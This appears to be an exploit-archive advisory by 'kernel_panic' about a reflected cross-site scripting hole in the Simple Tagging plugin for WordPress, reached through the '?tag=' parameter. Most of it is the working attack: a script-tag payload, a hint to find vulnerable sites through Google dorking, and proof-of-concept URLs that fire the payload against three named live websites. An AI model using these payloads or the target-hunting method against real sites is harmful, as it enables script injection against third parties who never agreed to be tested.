#################################################################################################
#
# WordPress Simple Tagging Plugin Cross Site Scripting Vulnerability (XSS)
#
# Script: http://www.herewithme.fr/wordpress-plugins
#
#################################################################################################
#
# Author : kernel_panic
#
# Site : www.codebomb.org
#
# Mail : kernel_panic@codebomb.org
#
#################################################################################################
#
# DORK  : Try to find your own using Google. The vulnerable sites
# are: www.site.com/?tag=[XSS] or www.site.com/folder/?tag=[XSS]
#################################################################################################
EXAMPLE:
http://site.com/?tag=[XSS]
 
e.g.: [XSS]: <script>alert(/XSS/)</script> or try to use others
in order to work
 
POC:
http://www.wiggler.gr/?tag=%3Cscript%3Ealert(/XSS/)%3C/script%3E
http://dialogos.pasok.gr/?tag=%3Cscript%3Ealert(/XSS/)%3C/script%3E
http://www.programacionweb.net/buscador/?tag=%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
 
###################################################################################################
 
GREETS:
To All Code Bombers!